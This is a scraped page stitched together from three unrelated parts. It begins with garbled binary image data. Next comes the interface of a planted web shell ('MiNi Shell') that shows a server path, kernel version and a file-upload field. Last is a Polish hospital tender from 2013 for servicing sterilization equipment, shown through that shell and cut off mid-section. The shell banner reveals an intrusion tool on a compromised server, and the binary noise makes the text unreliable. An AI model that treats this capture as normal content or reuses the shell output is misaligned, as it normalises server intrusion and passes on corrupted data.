JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130123/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130123/32944-N-2013.html

<p class="kh_header"><b>Radom: Na świadczenie usług  serwisowych  urządzeń  ciśnieniowych (autoklawy parowe i wytwornice pary) i sterylizatorów dla potrzeb    Radomskiego Szpitala Specjalistycznego</b><br>
<b>Numer ogłoszenia: 32944 - 2013; data zamieszczenia: 23.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Radomski Szpital Specjalistyczny im. dr Tytusa Chałubińskiego , ul. Lekarska 4, 26-610 Radom, woj. mazowieckie, tel. 48 3615285, 3615284, faks 48 3615213.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.radom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Na świadczenie usług  serwisowych  urządzeń  ciśnieniowych (autoklawy parowe i wytwornice pary) i sterylizatorów dla potrzeb    Radomskiego Szpitala Specjalistycznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi serwisowe dla urządzeń do sterylizacji sprzętu medycznego w asortymencie i ilościach określonych szczegółowo w wykazie sprzętu podlegającemu serwisowaniu polegające na:

1) wykonywaniu okresowych przeglądów technicznych i konserwacji  urządzeń  w terminach uzgodnionych z Zamawiającym,
2) usuwaniu awarii na pisemne zlecenie Zamawiającego, 

1.Pod pojęciem okresowych przeglądów technicznych i konserwacji należy rozumieć:
a)	przeprowadzenie wszelkich czynności technicznych w tym procedur konserwacyjnych wraz z wymianą elementów (typowanych przez producenta do wymiany przy przeglądach), 
b)	przeprowadzenie niezbędnych pomiarów i testów parametrów technicznych                i bezpieczeństwa elektrycznego,
c)	przeprowadzenie niezbędnych regulacji i ustawień parametrów technicznych zgodnych z wytycznymi producenta,
d)	przygotowanie sprzętu do badań technicznych (rewizji) wykonywanych przez Urząd Dozoru Technicznego oraz udział w ich badaniach (jeżeli dotyczy),
e)	dokonywanie wpisów do paszportów technicznych urządzeń,
f)   wystawianie każdorazowo orzeczeń technicznych (certyfikatów) 

2.Pod pojęciem usunięcia awarii należy rozumieć:
a)	zlokalizowanie uszkodzenia,
b)	usunięcie niesprawności urządzenia poprzez wymianę uszkodzonych części, 
c)	sprawdzenie poprawności działania,
d)	dokonywanie wpisu do paszportu technicznego z przeprowadzonej naprawy.
e)	przygotowanie sprzętu do badań technicznych (rewizji) wykonywanych przez Urząd Dozoru Technicznego oraz udział w ich badaniach (jeżeli dotyczy),

Wykonawca zobowiązuje się podjąć czynności związane z usunięciem awarii niezwłocznie, nie później jednak niż w ciągu 48 godzin od chwili jej zgłoszenia  w dni robocze od poniedziałku do piątku za wyjątkiem dni ustawowo wolnych od pracy.
	Po usunięciu awarii (jeżeli jest to wymagane odrębnymi przepisami) Wykonawca jest zobowiązany zgłosić ten fakt do UDT w celu przeprowadzenia badania odbiorczego. 
	W przypadku niedopuszczenia urządzenia do dalszej eksploatacji wskutek niewłaściwego przygotowania urządzenia do badania odbiorczego, Wykonawca pokrywa koszty związane  z ponownym wykonaniem badania odbiorczego.
Każdorazową interwencję serwisową Wykonawca odnotuje w paszporcie urządzenia. Potwierdzenie przyjęcia zlecenia Zamawiającego przesłanego fax-em do Wykonawcy, ma nastąpić poprzez jego zwrotne odesłanie z adnotacją przyjęcia do realizacji na nr fax-u 048/361-52-39.

3. Przeglądy okresowe i czynności usuwania awarii powinny być wykonywane  w siedzibie Zamawiającego, na jego pisemne zlecenie w oparciu o harmonogram przedstawiony Wykonawcy po podpisaniu umowy. W przypadku potrzeby przeprowadzenia przeglądu technicznego urządzenia lub jego  naprawy w siedzibie Wykonawcy, Wykonawca  zobowiązany jest w ramach usługi do zabrania  i ponownego dostarczenia  urządzenia do siedziby Zamawiającego w ramach ryczałtu.

4. Zaleca się zaoferowanie produktów (części) oryginalnych tj. produktów zgodnych pod względem parametrów technicznych, jakościowych, funkcjonalnych i użytkowych w stosunku do sprzętu posiadanego przez Zamawiającego. Zamawiający dopuszcza możliwość zaoferowania produktów równoważnych tj. posiadających te same lub lepsze parametry techniczne, jakościowe, funkcjonalne i użytkowe.

5. Wykonawca zobowiązuje się do zabezpieczenia części zamiennych potrzebnych do realizacji przedmiotu umowy.

6. Oferowany okres gwarancji należytego wykonania usług dla całego zakresu prac stanowiących przedmiot zamówienia, wynosi 6 miesięcy na wykonaną usługę (na ten sam rodzaj uszkodzenia) oraz 12 miesięcy za dostarczoną część, liczony od dnia wystawienia raportu serwisowego lub karty pracy.

7.  Rozliczenia między Wykonawcą a Zamawiającym:
1) Za przeglądy techniczne - wg. ryczałtu obejmującego 100% kosztów związanych                     z wykonaniem przeglądu (w tym badań UDT i wystawianiem orzeczeń technicznych (certyfikatów)).
2) Za usunięcie awarii - naliczanie wartości jako iloczyn zryczałtowanej stawki roboczogodziny (zgodnie ze specyfikacją techniczną/formularzem cenowym, stanowiącym załącznik do Formularza oferty) i faktycznie przepracowanych godzin.
 Zryczałtowana stawka za roboczogodzinę obejmuje - koszty robocizny, delegacyjne, koszty przygotowania sprzętu do badań UDT, sporządzenia orzeczeń o stanie urządzeń                              ( ekspertyza).
3) Za wymienione części zg. z fakturą VAT, w przypadku gdy wartość jednorazowej wymiany części przekroczy kwotę od 5000,00 zł brutto dla autoklawów   i od 15000 zł brutto dla wytwornic pary, Wykonawca  załączy do faktury kosztorys zaakceptowany przez Zamawiającego.
4) Koszty UDT po usunięciu awarii (jeżeli dotyczy) - pokrywane będą przez Zamawiającego. (Faktura wystawiona będzie przez UDT na Radomski Szpital                     Specjalistyczny).


8. W przypadku wyłączenia aparatu (urządzenia z użytkowania) podczas wykonywania usługi, do Wykonawcy należy obowiązek umieszczenia na niesprawnym aparacie /urządzeniu czytelnej informacji: /urządzenie niesprawne - nie używać/.

Wykaz sprzętu podlegającego serwisowaniu:

Część 1 - Autoklawy, wytwornice pary i sterylizatory parowe.

Nazwa urządzenia	Typ	Rok	Nr fab.	Producent
Autoklaw parowy                	Selectomat SL 669-2ED	2007	71157 /802-1447	BMT Czechy
Wytwornica pary 	6 STE / NAD 101	2007	71164	BMT Czechy
Autoklaw parowy                	Selectomat SL 636-1	2009	B 090223	MMM GmbH Niemcy
Autoklaw parowy                	Castle M/C 3533	1996	96F57946	MDT Castle USA
Wytwornica pary 	CAS-30	1996	32357	Sussman USA
Autoklaw parowy                	PS-400 PA	1977	77805 / 802-17	Chirana Słowacja
Autoklaw parowy                	PS-405 A	1991	911431/ 802-523	Chirana Słowacja
Autoklaw parowy                	ASHE/APD	2006	524/ 802-1377	SMS Warszawa
Autoklaw parowy                	ASHE/AP	1998	443/ 802-842	SMS Warszawa
Autoklaw parowy                	ASVE 	2001	2845	SMS Warszawa
Sterylizator parowy                	STERILCLAVE 18B	2005	05XO 9757/802-1206	BRIANZA - Włochy
Sterylizator parowy                	Mocom Millennium B2	2007	07 BG 0065	Mocom Włochy


Część 2- Sterylizator gazowy firmy 3M -USA

Nazwa urządzenia	Typ	Rok	Nr fab.	Producent	Termin rozpoczęcia Umowy od 17.11.2013, zakończenia w ciągu 2 lat od momentu podpisania Umowy lub do wyczerpania wartości.
Sterylizator gazowy	Steri-Vac 5XLP	1999	702886	3M USA	


Część 3 - Autoklaw parowy firmy CISA

Nazwa urządzenia	Typ	Rok	Nr fab.	Producent	Termin rozpoczęcia Umowy od 28.09.2013, zakończenia w ciągu 2 lat od momentu podpisania Umowy lub do wyczerpania wartości.
Autoklaw parowy                	CISA 3270HB/2P/E/TS	2007	12256 /802-1404	CISA Włochy	


Część 4 - Autoklaw parowy firmy Memmert
Nazwa urządzenia	Typ	Rok	Nr fab.	Producent	Termin rozpoczęcia Umowy od 27.09.2013, zakończenia w ciągu 2 lat od momentu podpisania Umowy lub do wyczerpania wartości. 
Sterylizator na suche powietrze	SFE 600 Memert	2007	G 6070730/ 802-1439	Memmert Niemcy	

Część 5 - Autoklaw parowy firmy Getinge
Nazwa urządzenia	Typ	Rok	Nr fab.	Producent	Termin rozpoczęcia Umowy od 29.07.2013 zakończenia w ciągu 2 lat od momentu podpisania Umowy lub do wyczerpania wartości,.
Autoklaw 
parowy                	HS 33	2010	10231447 / 802-1927	Getinge Szwecja.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca posiada wiedzę i doświadczenie, jeżeli w okresie ostatnich trzech lat przed upływem terminu składania ofert , wykonał lub wykonuje usługi serwisowe w zakresie przeglądów technicznych i usuwaniu awarii dla urządzeń do sterylizacji sprzętu medycznego :
dla części 1 (autoklawów, wytwornic pary i sterylizatorów parowych) na kwotę                       -  20 000,00 zł brutto łącznie, 
dla części 2 (sterylizatorów gazowych) na kwotę 5000  zł brutto
dla części 3 (autoklawów parowych) na kwotę 5000 zł brutto.
dla części 4 (autoklawów parowych ) na kwotę 5000 zł brutto.
dla części 5 (autoklawów parowych )na kwotę 5000 zł brutto. potwierdzoną przez usługodawcę.
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia powinni wykazać, że warunek określony powyżej spełnia jeden z Wykonawców lub spełniają łącznie.
Ocena spełniania warunku wiedza i doświadczenie od Wykonawców zostanie dokonana        wg formuły /spełnia - nie spełnia/ na podstawie załączonych do oferty oświadczeń  i dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca dysponuje osobami zdolnymi do wykonania przedmiotu zamówienia, jeżeli wykaże, że do jego dyspozycji są  przynajmniej 4 osoby, które posiadają świadectwa kwalifikacyjne wg załącznika nr 1 do Rozporządzenia Ministra Gospodarki, Pracy  i Polityki Społecznej z dnia 28.04.2003 r. (Dz. U. Nr 89 poz. 828). w zakresie obsługi, konserwacji, remontów, montażu i kontrolno-pomiarowym urządzeń: 
Grupa 1 - (Urządzenia, instalacje i sieci elektroenergetyczne wytwarzające, przetwarzające, przesyłające i zużywające energię elektryczną:),
pkt.2 (urządzenia, instalacje i sieci elektroenergetyczne o napięciu nie wyższym niż                     1 kV;) i pkt.10 (aparatura kontrolno-pomiarowa oraz urządzenia i instalacje automatycznej regulacji; sterowania i zabezpieczeń urządzeń i instalacji), w zakresie pkt.2 
Grupa 2 - (Urządzenia wytwarzające, przetwarzające, przesyłające i zużywające ciepło oraz inne urządzenia energetyczne), 
pkt.4  (przemysłowe urządzenia odbiorcze pary i gorącej wody, o mocy powyżej 50 kW)                                                         i pkt.10 (aparatura kontrolno-pomiarowa i urządzenia automatycznej regulacji do urządzeń                  i instalacji), w zakresie pkt.4., 
w tym 2 osoby dla serwisu urządzeń ciśnieniowych posiadające uprawnienia grupa 1 i 2 --, oraz 2 osoby dla serwisu urządzeń pozostałych posiadające uprawnienia  grupa 1)

Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana        wg formuły /spełnia - nie spełnia/ na podstawie załączonych do oferty oświadczeń  i dokumentów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokument lub dokumenty, z których będzie wynikać uprawnienie do podpisania oferty tj.
- wpis do KRS lub ewidencji działalności gospodarczej- które mogą być złożone w formie kopii poświadczonej za zgodność z oryginałem przez wykonawcę lub
- Pełnomocnictwo- w oryginale lub postaci  kopi  poświadczonej notarialnie</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a) ceny brutto mogą ulec zmianie w przypadku w przypadki zmiany stawki  podatku VAT wprowadzonej   przepisami prawa-mogą się zmienić od dnia wejścia w życie danego aktu prawnego, przy czym ulegnie zmianie wyłącznie cena brutto, cena netto pozostanie bez zmian, 
b) przedmiotem zmian treści umowy mogą być również zmiany adresowe lub rejestrowe
     stron umowy, 
   c)  Zamawiający przewiduje możliwość  wprowadzenia Aneksu do umowy korygującego ilość sprzętu, objętego umową, w przypadku wycofania z eksploatacji urządzenia objętego umową.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.radom.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Radomski Szpital Specjalistyczny
Dział Zamówień Publicznych, Funduszy Strukturalnych i Zaopatrzenia, pokój 308
ul. Lekarska 4
26-601 Radom.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.01.2013 godzina 10:00, miejsce: Radomski Szpital Specjalistyczny
Dział Zamówień Publicznych, Funduszy Strukturalnych i Zaopatrzenia, pokój 308
ul. Lekarska 4
26-601 Radom.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część 1 - Autoklawy, wytwornice pary i sterylizatory parowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykaz sprzętu podlagajacemu serwisowaniu
Część 1 - Autoklawy, wytwornice pary i sterylizatory parowe.

Nazwa urządzenia	Typ	Rok	Nr fab.	Producent
Autoklaw parowy                	Selectomat SL 669-2ED	2007	71157 /802-1447	BMT Czechy
Wytwornica pary 	6 STE / NAD 101	2007	71164	BMT Czechy
Autoklaw parowy                	Selectomat SL 636-1	2009	B 090223	MMM GmbH Niemcy
Autoklaw parowy                	Castle M/C 3533	1996	96F57946	MDT Castle USA
Wytwornica pary 	CAS-30	1996	32357	Sussman USA
Autoklaw parowy                	PS-400 PA	1977	77805 / 802-17	Chirana Słowacja
Autoklaw parowy                	PS-405 A	1991	911431/ 802-523	Chirana Słowacja
Autoklaw parowy                	ASHE/APD	2006	524/ 802-1377	SMS Warszawa
Autoklaw parowy                	ASHE/AP	1998	443/ 802-842	SMS Warszawa
Autoklaw parowy                	ASVE 	2001	2845	SMS Warszawa
Sterylizator parowy                	STERILCLAVE 18B	2005	05XO 9757/802-1206	BRIANZA - Włochy
Sterylizator parowy                	Mocom Millennium B2	2007	07 BG 0065	Mocom Włochy
Przedmiotem zamówienia są usługi serwisowe dla urządzeń do sterylizacji sprzętu medycznego w asortymencie i ilościach określonych szczegółowo w wykazie sprzętu podlegającemu serwisowaniu polegające na:

1) wykonywaniu okresowych przeglądów technicznych i konserwacji  urządzeń  w terminach uzgodnionych z Zamawiającym,
2) usuwaniu awarii na pisemne zlecenie Zamawiającego, 

1.Pod pojęciem okresowych przeglądów technicznych i konserwacji należy rozumieć:
a)	przeprowadzenie wszelkich czynności technicznych w tym procedur konserwacyjnych wraz z wymianą elementów (typowanych przez producenta do wymiany przy przeglądach), 
b)	przeprowadzenie niezbędnych pomiarów i testów parametrów technicznych                i bezpieczeństwa elektrycznego,
c)	przeprowadzenie niezbędnych regulacji i ustawień parametrów technicznych zgodnych z wytycznymi producenta,
d)	przygotowanie sprzętu do badań technicznych (rewizji) wykonywanych przez Urząd Dozoru Technicznego oraz udział w ich badaniach (jeżeli dotyczy),
e)	dokonywanie wpisów do paszportów technicznych urządzeń,
f)   wystawianie każdorazowo orzeczeń technicznych (certyfikatów) 

2.Pod pojęciem usunięcia awarii należy rozumieć:
a)	zlokalizowanie uszkodzenia,
b)	usunięcie niesprawności urządzenia poprzez wymianę uszkodzonych części, 
c)	sprawdzenie poprawności działania,
d)	dokonywanie wpisu do paszportu technicznego z przeprowadzonej naprawy.
e)	przygotowanie sprzętu do badań technicznych (rewizji) wykonywanych przez Urząd Dozoru Technicznego oraz udział w ich badaniach (jeżeli dotyczy),

Wykonawca zobowiązuje się podjąć czynności związane z usunięciem awarii niezwłocznie, nie później jednak niż w ciągu 48 godzin od chwili jej zgłoszenia  w dni robocze od poniedziałku do piątku za wyjątkiem dni ustawowo wolnych od pracy.
	Po usunięciu awarii (jeżeli jest to wymagane odrębnymi przepisami) Wykonawca jest zobowiązany zgłosić ten fakt do UDT w celu przeprowadzenia badania odbiorczego. 
	W przypadku niedopuszczenia urządzenia do dalszej eksploatacji wskutek niewłaściwego przygotowania urządzenia do badania odbiorczego, Wykonawca pokrywa koszty związane  z ponownym wykonaniem badania odbiorczego.
Każdorazową interwencję serwisową Wykonawca odnotuje w paszporcie urządzenia. Potwierdzenie przyjęcia zlecenia Zamawiającego przesłanego fax-em do Wykonawcy, ma nastąpić poprzez jego zwrotne odesłanie z adnotacją przyjęcia do realizacji na nr fax-u 048/361-52-39.

3. Przeglądy okresowe i czynności usuwania awarii powinny być wykonywane  w siedzibie Zamawiającego, na jego pisemne zlecenie w oparciu o harmonogram przedstawiony Wykonawcy po podpisaniu umowy. W przypadku potrzeby przeprowadzenia przeglądu technicznego urządzenia lub jego  naprawy w siedzibie Wykonawcy, Wykonawca  zobowiązany jest w ramach usługi do zabrania  i ponownego dostarczenia  urządzenia do siedziby Zamawiającego w ramach ryczałtu.

4. Zaleca się zaoferowanie produktów (części) oryginalnych tj. produktów zgodnych pod względem parametrów technicznych, jakościowych, funkcjonalnych i użytkowych w stosunku do sprzętu posiadanego przez Zamawiającego. Zamawiający dopuszcza możliwość zaoferowania produktów równoważnych tj. posiadających te same lub lepsze parametry techniczne, jakościowe, funkcjonalne i użytkowe.

5. Wykonawca zobowiązuje się do zabezpieczenia części zamiennych potrzebnych do realizacji przedmiotu umowy.

6. Oferowany okres gwarancji należytego wykonania usług dla całego zakresu prac stanowiących przedmiot zamówienia, wynosi 6 miesięcy na wykonaną usługę (na ten sam rodzaj uszkodzenia) oraz 12 miesięcy za dostarczoną część, liczony od dnia wystawienia raportu serwisowego lub karty pracy.

7.  Rozliczenia między Wykonawcą a Zamawiającym:
